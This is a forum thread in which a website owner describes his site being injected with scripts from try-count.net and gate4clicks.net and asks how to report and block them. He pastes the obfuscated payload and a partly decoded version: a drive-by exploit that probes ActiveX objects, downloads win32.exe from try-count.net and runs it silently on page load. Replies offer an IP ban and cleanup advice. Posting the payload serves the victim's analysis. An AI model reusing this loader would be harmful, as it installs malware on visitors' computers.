I just made a major BREAKTHROUGH in the hacking of my website... currently my website is being hacked: "thegermz.com" — DON'T GO THERE, YOU'LL GET HACKED. I made a thread here in DP in the server section but they didn't help me much, so I'm hoping the coding guys know a little more about this... Anyway, the problem started when I went to my site and noticed that in the bottom corner of my Firefox browser (where it shows what is currently loading) it said "waiting for try-count.net", which I found weird since I've never even linked to or visited that site... Then my PC got blocked and I couldn't even move the mouse; seconds later it was unblocked, but my PC was very slow, so I knew I was hacked and contacted my host, but I had to leave in the middle of the chat. I then came back to my site and noticed another website I never knew about was loading, "gate4clicks.net"... I still haven't found anything about that site, but I DID find something about the other one, try-count. I searched Google for the name of the site and found this link http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=7855 — apparently they had problems with that site as well... so I went to one of the try-count links, try-count.net/dl/newnew.php?adv=194 — DON'T GO THERE!
And found a lot of javascript: <html><body><SCRIPT LANGUAGE="javascript" TYPE="text/javascript">document.write(unescape('%3c%68%74%6d%6c%3e%3c%68%65%61%64%3e%3c%74%69%74%6c%65%3e%3c%2f%74%69%74%6c%65%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%6a%61%76%61')); document.write(unescape('%73%63%72%69%70%74%22%3e%66%75%6e%63%74%69%6f%6e%20%4c%6f%67%28%6d%29%20%7b%20%20%20%20%20%20%20%20%76%61%72%20%6c%6f%67%20%3d%20%64%6f%63%75')); document.write(unescape('%6d%65%6e%74%2e%63%72%65%61%74%65%45%6c%65%6d%65%6e%74%28%27%70%27%29%3b%20%20%20%20%20%20%20%20%6c%6f%67%2e%69%6e%6e%65%72%48%54%4d%4c%20%3d%20%6d')); document.write(unescape('%3b%20%20%20%20%20%20%20%20%64%6f%63%75%6d%65%6e%74%2e%62%6f%64%79%2e%61%70%70%65%6e%64%43%68%69%6c%64%28%6c%6f%67%29%3b%20%20%20%20%20%20%20%20')); document.write(unescape('%7d%66%75%6e%63%74%69%6f%6e%20%43%72%65%61%74%65%4f%28%6f%2c%20%6e%29%20%7b%20%20%20%20%20%20%20%20%76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b')); document.write(unescape('%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%6f%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28%6e')); Code (markup): That's just a little portion of the source, imagine about 200+ more lines of the same thing so I decided to google "document.write(unescape(" since I've never heard of it and I found that apparently the code is a way to "hide" HTML and/or javascript from other people who view your page's source code. 
I went to a place that decodes it and found the decoded source, which was <html><body><SCRIPT LANGUAGE="javascript" TYPE="text/javascript">document.write(unescape('<html><head><title></title><script language="java')); document.write(unescape('script">function Log(m) { var log = docu')); document.write(unescape('ment.createElement('p'); log.innerHTML = m')); document.write(unescape('; document.body.appendChild(log); ')); document.write(unescape('}function CreateO(o, n) { var r = null;')); document.write(unescape(' try { eval('r = o.CreateObject(n')); document.write(unescape(')') }catch(e){} if (! r) { ')); document.write(unescape(' try { eval('r = o.CreateObject(n, "")') ')); document.write(unescape('}catch(e){} } if (! r) {')); document.write(unescape(' try { eval('r = o.CreateObject(n, ')); document.write(unescape('"", "")') }catch(e){} } if (! r) ')); document.write(unescape('{ try { eval('r = o.GetObject("", ')); document.write(unescape('n)') }catch(e){} } if (! ')); document.write(unescape('r) { try { eval('r = o.GetObject(n')); document.write(unescape(', "")') }catch(e){} } if ')); document.write(unescape('(! 
r) { try { eval('r = o.GetObjec')); document.write(unescape('t(n)') }catch(e){} } retu')); document.write(unescape('rn(r); }function Go(a) { Log('Crea')); document.write(unescape('ting helper objects...'); var s = CreateO(')); document.write(unescape('a, "WScript.Shell"); var o = CreateO(a, "A')); document.write(unescape('DODB.Stream"); var e = s.Environment("Proc')); document.write(unescape('ess"); Log('Ceating the XMLHTTP o')); document.write(unescape('bject...'); var url = "http://try-count.net/dl/')); document.write(unescape('194/win32.exe"; var xml = null; var')); document.write(unescape(' bin = e.Item("TEMP")+ "\\" + "metasploit.exe"; ')); document.write(unescape(' var dat; try { xml=new XML')); document.write(unescape('HttpRequest(); } catch(e) { ')); document.write(unescape(' try { xml = new ActiveXObject("Microsoft.XMLHTTP')); document.write(unescape('"); } catch(e) { ')); document.write(unescape(' xml = new ActiveXObject("MSXML2.ServerXMLHT')); document.write(unescape('TP"); } } ')); document.write(unescape(' if (! 
xml) return(0); Log(''); ')); document.write(unescape(' xml.open("GET", url, false) xml.send(')); document.write(unescape('null); dat = xml.responseBody; Lo')); document.write(unescape('g(''); o.Type = 1; o.Mode = 3; ')); document.write(unescape(' o.Open(); o.Write(dat); o.S')); document.write(unescape('aveToFile(bin, 2); Log('.'); ')); document.write(unescape(' s.Run(bin,0);}function Exploit() {')); document.write(unescape(' var i = 0; var t = new Array('{BD9')); document.write(unescape('6C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A')); document.write(unescape('3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-93')); document.write(unescape('22-D4A210617116}','{0006F033-0000-0000-C000-000000')); document.write(unescape('000046}','{0006F03A-0000-0000-C000-000000000046}',')); document.write(unescape(''{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512')); document.write(unescape('B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-43')); document.write(unescape('31-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-0')); document.write(unescape('9FCD1DB0766}','{639F725F-1B2D-4831-A9FD-8748476820')); document.write(unescape('10}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0')); document.write(unescape('C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA')); document.write(unescape('28-496b-B050-6C07C962476B}',null); while')); document.write(unescape(' (t[i]) { var a = null; ')); document.write(unescape(' if (t[i].substring(0,1) == ')); document.write(unescape(''{') { a = document.create')); document.write(unescape('Element("object"); a.setAt')); document.write(unescape('tribute("classid", "clsid:" + t[i].substring(1, t[')); document.write(unescape('i].length - 1)); } else { ')); document.write(unescape(' try { a = new ActiveXObject(t[i]);')); document.write(unescape(' } catch(e){} } ')); document.write(unescape(' if (a) { tr')); document.write(unescape('y { var')); document.write(unescape(' b = CreateO(a, "WScript.Shell"); ')); document.write(unescape(' if (b) { ')); 
document.write(unescape(' Log('Loaded ' + t[i]); ')); document.write(unescape(' Go(a); ')); document.write(unescape(' return(0); ')); document.write(unescape(' } } catc')); document.write(unescape('h(e){} } i++; ')); document.write(unescape(' } Log('');}</script></head><body o')); document.write(unescape('nload='Exploit()'><p></p></body></html><html>')); document.write(unescape('<body><script>document.write(unescape("%3c%48%54')); document.write(unescape('%4d%4c%3e%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%6')); Code (markup): And then there are a lot MORE lines of percent numbers.... as you can see that site is malicious and I want to report it but I have no idea how. I also want to block access to my site but I don't know how either so if anyone knows feel free to help.
Hey, I hope this info helps you and stops this from happening again. You can repeat some of the lines in the code to make it work for multiple IPs and addresses. The IP address of the server that try - count . net is on is 77.91.229.38. Note that an .htaccess ban only blocks requests coming from that address to your server; it does not remove the injected script from your own pages, which is what your visitors' browsers are loading try-count from, so the injected code still has to be cleaned out of the site itself. http://www.hybrid6.com/webgeek/2006/12/htaccess-ip-banning-block-bad-visitors.php
jeez, I got the same attack on a fatcow hosting account - then G flagged some of my client's websites.